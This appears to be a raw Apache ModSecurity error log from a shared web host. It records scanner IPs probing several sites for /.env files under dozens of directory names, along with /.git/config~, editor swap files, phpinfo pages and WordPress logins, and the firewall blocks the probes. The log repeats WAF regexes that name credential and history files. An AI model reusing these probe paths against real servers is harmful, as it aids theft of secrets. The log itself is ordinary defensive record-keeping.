[Tue May 26 15:15:28.813427 2026] [security2:error] [pid 700087:tid 700289] [client 195.178.110.199:37396] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.git/config~"] [unique_id "ahVruJPHQM4as9fEIIZ-RgAAAEg"]
[Tue May 26 15:15:28.877778 2026] [security2:error] [pid 700087:tid 700295] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVruJPHQM4as9fEIIZ-KAAAAE4"]
[Tue May 26 15:15:29.346601 2026] [security2:error] [pid 700087:tid 700322] [client 176.65.139.239:59640] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "knightmasonsssea.org.svijaykumar.in"] [uri "/.env"] [unique_id "ahVruZPHQM4as9fEIIZ-bQAAAGk"]
[Tue May 26 15:15:29.407202 2026] [security2:error] [pid 700087:tid 700235] [client 176.65.139.231:45738] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.athelstan.org.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVruZPHQM4as9fEIIZ-bwAAABI"]
[Tue May 26 15:15:29.655873 2026] [autoindex:error] [pid 700087:tid 700257] [client 195.178.110.199:37278] AH01276: Cannot serve directory /home1/pronuyyv/public_html/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:15:29.785691 2026] [security2:error] [pid 700087:tid 700314] [client 195.178.110.199:37282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/ADMIN/.env"] [unique_id "ahVruZPHQM4as9fEIIZ-iAAAAGE"]
[Tue May 26 15:15:29.893083 2026] [security2:error] [pid 700087:tid 700319] [client 195.178.110.199:37378] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/.wp-config.php.swp"] [unique_id "ahVruZPHQM4as9fEIIZ-jgAAAGY"]
[Tue May 26 15:15:30.086469 2026] [security2:error] [pid 700087:tid 700344] [client 195.178.110.199:37344] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/API/.env"] [unique_id "ahVrupPHQM4as9fEIIZ-mQAAAH8"]
[Tue May 26 15:15:30.182167 2026] [security2:error] [pid 700087:tid 700323] [client 195.178.110.199:37250] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/Backend/.env"] [unique_id "ahVrupPHQM4as9fEIIZ-ngAAAGo"]
[Tue May 26 15:15:30.202302 2026] [security2:error] [pid 700087:tid 700241] [client 195.178.110.199:37396] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/Be/.env"] [unique_id "ahVrupPHQM4as9fEIIZ-nwAAABg"]
[Tue May 26 15:15:30.224109 2026] [security2:error] [pid 700087:tid 700266] [client 195.178.110.199:37336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/Api/.env"] [unique_id "ahVrupPHQM4as9fEIIZ-oAAAADE"]
[Tue May 26 15:15:30.224112 2026] [security2:error] [pid 700087:tid 700294] [client 195.178.110.199:37382] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/APP/.env"] [unique_id "ahVrupPHQM4as9fEIIZ-oQAAAE0"]
[Tue May 26 15:15:30.239893 2026] [security2:error] [pid 700087:tid 700279] [client 195.178.110.199:37362] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/BACKEND/.env"] [unique_id "ahVrupPHQM4as9fEIIZ-owAAAD4"]
[Tue May 26 15:15:30.260371 2026] [security2:error] [pid 700087:tid 700097] [remote 121.200.216.55:32944] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVrupPHQM4as9fEIIZ-mAAASAk"]
[Tue May 26 15:15:30.339298 2026] [security2:error] [pid 700087:tid 700244] [client 195.178.110.199:37236] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/BE/.env"] [unique_id "ahVrupPHQM4as9fEIIZ-rwAAABs"]
[Tue May 26 15:15:30.426042 2026] [security2:error] [pid 700087:tid 700231] [client 195.178.110.199:37230] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/BACK/.env"] [unique_id "ahVrupPHQM4as9fEIIZ-tAAAAA4"]
[Tue May 26 15:15:30.828459 2026] [security2:error] [pid 700087:tid 700220] [client 195.178.110.199:37236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVrupPHQM4as9fEIIZ-0gAAAAM"]
[Tue May 26 15:15:30.861562 2026] [security2:error] [pid 700087:tid 700236] [client 195.178.110.199:37344] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin-app/.env"] [unique_id "ahVrupPHQM4as9fEIIZ-1QAAABM"]
[Tue May 26 15:15:31.119697 2026] [security2:error] [pid 700087:tid 700319] [client 195.178.110.199:37230] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/administrator/.env"] [unique_id "ahVru5PHQM4as9fEIIZ-4QAAAGY"]
[Tue May 26 15:15:31.127452 2026] [security2:error] [pid 700087:tid 700265] [client 195.178.110.199:37278] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api-backend/.env"] [unique_id "ahVru5PHQM4as9fEIIZ-4gAAADA"]
[Tue May 26 15:15:31.172870 2026] [security2:error] [pid 700087:tid 700219] [client 195.178.110.199:37346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/.env"] [unique_id "ahVru5PHQM4as9fEIIZ-5AAAAAI"]
[Tue May 26 15:15:31.201550 2026] [security2:error] [pid 700087:tid 700259] [client 195.178.110.199:37250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/admin/phpinfo.php"] [unique_id "ahVru5PHQM4as9fEIIZ-6QAAACo"]
[Tue May 26 15:15:31.258772 2026] [security2:error] [pid 700087:tid 700327] [client 195.178.110.199:37400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/admin_phpinfo.php"] [unique_id "ahVru5PHQM4as9fEIIZ-8AAAAG4"]
[Tue May 26 15:15:31.294884 2026] [security2:error] [pid 700087:tid 700242] [client 195.178.110.199:37362] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api-node/.env"] [unique_id "ahVru5PHQM4as9fEIIZ-8gAAABk"]
[Tue May 26 15:15:31.517204 2026] [security2:error] [pid 700087:tid 700252] [client 195.178.110.199:37396] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/api/phpinfo.php"] [unique_id "ahVru5PHQM4as9fEIIZ_CAAAACM"]
[Tue May 26 15:15:31.607580 2026] [security2:error] [pid 700087:tid 700326] [client 195.178.110.199:37380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/api/info.php"] [unique_id "ahVru5PHQM4as9fEIIZ_DQAAAG0"]
[Tue May 26 15:15:31.676217 2026] [security2:error] [pid 700087:tid 700278] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVru5PHQM4as9fEIIZ-8QAAAD0"]
[Tue May 26 15:15:31.854552 2026] [security2:error] [pid 700087:tid 700287] [client 195.178.110.199:37282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/apis/.env"] [unique_id "ahVru5PHQM4as9fEIIZ_FwAAAEY"]
[Tue May 26 15:15:32.157881 2026] [security2:error] [pid 700087:tid 700283] [client 195.178.110.199:60240] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/app/.env"] [unique_id "ahVrvJPHQM4as9fEIIZ_LQAAAEI"]
[Tue May 26 15:15:32.320289 2026] [security2:error] [pid 700087:tid 700251] [client 195.178.110.199:37278] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/application/.env"] [unique_id "ahVrvJPHQM4as9fEIIZ_OgAAACI"]
[Tue May 26 15:15:32.356728 2026] [security2:error] [pid 700087:tid 700224] [client 176.65.139.234:64386] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "athelstan.org.in"] [uri "/.env"] [unique_id "ahVrvJPHQM4as9fEIIZ_PgAAAAc"]
[Tue May 26 15:15:32.530944 2026] [security2:error] [pid 700087:tid 700227] [client 195.178.110.199:60192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/apps/.env"] [unique_id "ahVrvJPHQM4as9fEIIZ_SAAAAAo"]
[Tue May 26 15:15:32.937546 2026] [security2:error] [pid 700087:tid 700331] [client 195.178.110.199:60176] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backend-api/.env"] [unique_id "ahVrvJPHQM4as9fEIIZ_awAAAHI"]
[Tue May 26 15:15:33.020546 2026] [security2:error] [pid 700087:tid 700340] [client 195.178.110.199:37362] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/back-api/.env"] [unique_id "ahVrvZPHQM4as9fEIIZ_cAAAAHs"]
[Tue May 26 15:15:33.056044 2026] [security2:error] [pid 700087:tid 700342] [client 195.178.110.199:60202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/back-end/.env"] [unique_id "ahVrvZPHQM4as9fEIIZ_cwAAAH0"]
[Tue May 26 15:15:33.081006 2026] [security2:error] [pid 700087:tid 700291] [client 195.178.110.199:37266] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/back/.env"] [unique_id "ahVrvZPHQM4as9fEIIZ_dQAAAEo"]
[Tue May 26 15:15:33.108069 2026] [security2:error] [pid 700087:tid 700306] [client 195.178.110.199:37316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backend/.env"] [unique_id "ahVrvZPHQM4as9fEIIZ_eAAAAFk"]
[Tue May 26 15:15:33.146674 2026] [security2:error] [pid 700087:tid 700301] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrvJPHQM4as9fEIIZ_XAAAAFQ"]
[Tue May 26 15:15:33.214497 2026] [security2:error] [pid 700087:tid 700290] [client 195.178.110.199:60240] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/beta/.env"] [unique_id "ahVrvZPHQM4as9fEIIZ_gQAAAEk"]
[Tue May 26 15:15:33.346868 2026] [security2:error] [pid 700087:tid 700271] [client 195.178.110.199:37362] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backup/.env"] [unique_id "ahVrvZPHQM4as9fEIIZ_igAAADY"]
[Tue May 26 15:15:33.362282 2026] [security2:error] [pid 700087:tid 700263] [client 195.178.110.199:37230] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/be/.env"] [unique_id "ahVrvZPHQM4as9fEIIZ_iwAAAC4"]
[Tue May 26 15:15:33.530932 2026] [security2:error] [pid 700087:tid 700311] [client 195.178.110.199:37346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/client/.env"] [unique_id "ahVrvZPHQM4as9fEIIZ_mAAAAF4"]
